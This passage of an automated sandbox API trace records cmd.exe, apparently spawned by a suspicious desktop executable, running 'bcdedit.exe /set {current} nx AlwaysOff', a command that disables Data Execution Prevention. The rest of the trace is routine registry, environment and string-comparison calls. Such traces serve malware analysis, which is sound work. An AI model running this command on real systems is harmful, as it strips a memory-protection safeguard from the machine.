{current} nx AlwaysOff" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x89c [0099.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fa00 | out: lpSystemTimeAsFileTime=0x31fa00*(dwLowDateTime=0x8f2c3570, dwHighDateTime=0x1d5956e)) [0099.254] GetCurrentProcessId () returned 0x6d0 [0099.254] GetCurrentThreadId () returned 0x89c [0099.254] GetTickCount () returned 0x1152efd [0099.254] QueryPerformanceCounter (in: lpPerformanceCount=0x31fa08 | out: lpPerformanceCount=0x31fa08*=21953943166) returned 1 [0099.256] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0099.256] __set_app_type (_Type=0x1) [0099.256] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0099.256] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0099.256] GetCurrentThreadId () returned 0x89c [0099.256] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x89c) returned 0x3c [0099.256] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.256] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.256] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.257] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f998 | out: phkResult=0x31f998*=0x0) returned 0x2 [0099.257] VirtualQuery (in: lpAddress=0x31f980, lpBuffer=0x31f900, dwLength=0x30 | out: lpBuffer=0x31f900*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.257] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31f900, dwLength=0x30 | out: lpBuffer=0x31f900*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.257] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31f900, dwLength=0x30 | out: lpBuffer=0x31f900*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.257] VirtualQuery (in: lpAddress=0x224000, lpBuffer=0x31f900, dwLength=0x30 | out: lpBuffer=0x31f900*(BaseAddress=0x224000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.257] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31f900, dwLength=0x30 | out: lpBuffer=0x31f900*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.257] GetConsoleOutputCP () returned 0x1b5 [0099.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.258] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.258] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.258] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.258] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.258] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.258] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.258] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.258] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.258] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.259] GetEnvironmentStringsW () returned 0xfaa50* [0099.259] GetProcessHeap () returned 0xe0000 [0099.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa7c) returned 0xfb4e0 [0099.259] FreeEnvironmentStringsW (penv=0xfaa50) returned 1 [0099.259] GetProcessHeap () returned 0xe0000 [0099.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xfbf70 [0099.259] GetEnvironmentStringsW () returned 0xfaa50* [0099.259] GetProcessHeap () returned 0xe0000 [0099.259] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa7c) returned 0xfbf90 [0099.259] FreeEnvironmentStringsW (penv=0xfaa50) returned 1 [0099.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e858 | out: phkResult=0x31e858*=0x44) returned 0x0 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x18, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x1, lpcbData=0x31e854*=0x4) returned 0x0 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x1, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x0, lpcbData=0x31e854*=0x4) returned 0x0 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x40, lpcbData=0x31e854*=0x4) returned 0x0 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x40, lpcbData=0x31e854*=0x4) returned 0x0 [0099.259] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x40, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.260] RegCloseKey (hKey=0x44) returned 0x0 [0099.260] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e858 | out: phkResult=0x31e858*=0x44) returned 0x0 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x40, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x1, lpcbData=0x31e854*=0x4) returned 0x0 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x1, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x0, lpcbData=0x31e854*=0x4) returned 0x0 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x9, lpcbData=0x31e854*=0x4) returned 0x0 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x4, lpData=0x31e870*=0x9, lpcbData=0x31e854*=0x4) returned 0x0 [0099.260] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e850, lpData=0x31e870, lpcbData=0x31e854*=0x1000 | out: lpType=0x31e850*=0x0, lpData=0x31e870*=0x9, lpcbData=0x31e854*=0x1000) returned 0x2 [0099.260] RegCloseKey (hKey=0x44) returned 0x0 [0099.260] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.260] srand (_Seed=0x5dc41ad7) [0099.260] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff" [0099.260] GetCommandLineW () returned="/C bcdedit.exe /set {current} nx AlwaysOff" [0099.260] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.260] GetProcessHeap () returned 0xe0000 [0099.260] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x218) returned 0xfca20 [0099.260] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xfca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.261] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.261] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.261] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.261] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.261] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.261] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.261] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.261] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.261] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.261] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.261] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.261] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.261] GetProcessHeap () returned 0xe0000 [0099.261] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfb4e0 | out: hHeap=0xe0000) returned 1 [0099.261] GetEnvironmentStringsW () returned 0xfaa50* [0099.261] GetProcessHeap () returned 0xe0000 [0099.261] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa94) returned 0xfcc40 [0099.261] FreeEnvironmentStringsW (penv=0xfaa50) returned 1 [0099.261] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.261] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.261] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.261] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.261] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.261] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.261] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.261] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.261] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.261] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.261] GetProcessHeap () returned 0xe0000 [0099.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x5c) returned 0xf8300 [0099.262] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f660 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f660, lpFilePart=0x31f640 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f640*="Desktop") returned 0x25 [0099.262] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.262] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f370 | out: lpFindFileData=0x31f370*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0xf99a0 [0099.262] FindClose (in: hFindFile=0xf99a0 | out: hFindFile=0xf99a0) returned 1 [0099.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f370 | out: lpFindFileData=0x31f370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xf99a0 [0099.262] FindClose (in: hFindFile=0xf99a0 | out: hFindFile=0xf99a0) returned 1 [0099.262] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x31f370 | out: lpFindFileData=0x31f370*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0xf99a0 [0099.262] FindClose (in: hFindFile=0xf99a0 | out: hFindFile=0xf99a0) returned 1 [0099.262] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.262] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.262] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.262] GetProcessHeap () returned 0xe0000 [0099.262] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfcc40 | out: hHeap=0xe0000) returned 1 [0099.262] GetEnvironmentStringsW () returned 0xfcc40* [0099.262] GetProcessHeap () returned 0xe0000 [0099.262] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xae8) returned 0xfd730 [0099.263] FreeEnvironmentStringsW (penv=0xfcc40) returned 1 [0099.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.263] GetProcessHeap () returned 0xe0000 [0099.263] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf8300 | out: hHeap=0xe0000) returned 1 [0099.263] GetProcessHeap () returned 0xe0000 [0099.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4016) returned 0xfe220 [0099.263] GetProcessHeap () returned 0xe0000 [0099.263] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x64) returned 0xf8300 [0099.263] GetProcessHeap () returned 0xe0000 [0099.263] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfe220 | out: hHeap=0xe0000) returned 1 [0099.263] GetConsoleOutputCP () returned 0x1b5 [0099.477] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.477] GetUserDefaultLCID () returned 0x409 [0099.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x31f770, cchData=128 | out: lpLCData="0") returned 2 [0099.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x31f770, cchData=128 | out: lpLCData="0") returned 2 [0099.477] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x31f770, cchData=128 | out: lpLCData="1") returned 2 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4acfa740, cchData=8 | out: lpLCData="/") returned 2 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4acfa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4acfa460, cchData=32 | out: lpLCData="Tue") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4acfa420, cchData=32 | out: lpLCData="Wed") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4acfa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4acfa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4acfa360, cchData=32 | out: lpLCData="Sat") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4acfa700, cchData=32 | out: lpLCData="Sun") returned 4 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ace7b40, cchData=8 | out: lpLCData=".") returned 2 [0099.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4acfa4e0, cchData=8 | out: lpLCData=",") returned 2 [0099.478] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.479] GetProcessHeap () returned 0xe0000 [0099.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x20c) returned 0xfb5b0 [0099.479] GetConsoleTitleW (in: lpConsoleTitle=0xfb5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.479] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0099.479] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0099.479] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0099.479] GetProcessHeap () returned 0xe0000 [0099.479] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4012) returned 0xfe220 [0099.479] GetProcessHeap () returned 0xe0000 [0099.480] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfe220 | out: hHeap=0xe0000) returned 1 [0099.480] _wcsicmp (_String1="bcdedit.exe", _String2=")") returned 57 [0099.480] _wcsicmp (_String1="FOR", _String2="bcdedit.exe") returned 4 [0099.480] _wcsicmp (_String1="FOR/?", _String2="bcdedit.exe") returned 4 [0099.480] _wcsicmp (_String1="IF", _String2="bcdedit.exe") returned 7 [0099.480] _wcsicmp (_String1="IF/?", _String2="bcdedit.exe") returned 7 [0099.480] _wcsicmp (_String1="REM", _String2="bcdedit.exe") returned 16 [0099.480] _wcsicmp (_String1="REM/?", _String2="bcdedit.exe") returned 16 [0099.480] GetProcessHeap () returned 0xe0000 [0099.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0) returned 0xfb7d0 [0099.480] GetProcessHeap () returned 0xe0000 [0099.480] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x28) returned 0xf45f0 [0099.481] GetProcessHeap () returned 0xe0000 [0099.481] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4a) returned 0xf99a0 [0099.481] GetConsoleTitleW (in: lpConsoleTitle=0x31f680, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.482] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcdedit.exe")) returned 0xffffffff [0099.482] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.482] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.482] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.482] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.482] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.482] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.482] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.482] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.482] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.482] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.482] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.482] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.482] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.482] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.482] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.482] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.482] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.482] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.482] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.483] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.483] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.483] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.483] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.483] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.483] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.483] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.483] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.483] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.483] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.483] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.483] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.483] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0099.483] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0099.483] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0099.483] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0099.483] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0099.483] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0099.483] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0099.483] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0099.483] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0099.483] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0099.483] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0099.483] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0099.483] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0099.483] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0099.483] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0099.483] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0099.483] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0099.483] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0099.483] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0099.483] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0099.483] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0099.483] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0099.483] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0099.484] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0099.484] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0099.484] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0099.484] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0099.484] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0099.484] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0099.484] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0099.484] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0099.484] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0099.484] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0099.484] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0099.484] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0099.484] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0099.484] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0099.484] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0099.484] _wcsicmp (_String1="bcdedit", 